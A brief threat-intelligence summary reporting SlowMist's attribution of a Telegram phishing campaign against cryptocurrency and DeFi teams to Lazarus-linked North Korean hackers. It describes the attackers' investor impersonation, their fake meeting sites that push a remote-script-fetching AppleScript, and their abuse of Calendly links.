SlowMist attributes a Telegram phishing operation targeting cryptocurrency and DeFi project teams to Lazarus-linked North Korean hackers active since 2022. The attackers impersonate reputable investment institutions with fake Telegram accounts, build trust with project teams, and then steer victims toward malicious meeting workflows. One infection path uses meeting domains such as group-meeting-themed sites to persuade targets to run a location-modifying AppleScript that fetches a remote script, while another abuses Calendly custom links to place malicious URLs inside otherwise familiar scheduling pages. The activity matters for Web3 defenders because it combines social engineering, investor impersonation, and meeting-tool abuse to gain control of team systems and potentially steal funds or wallet-related access.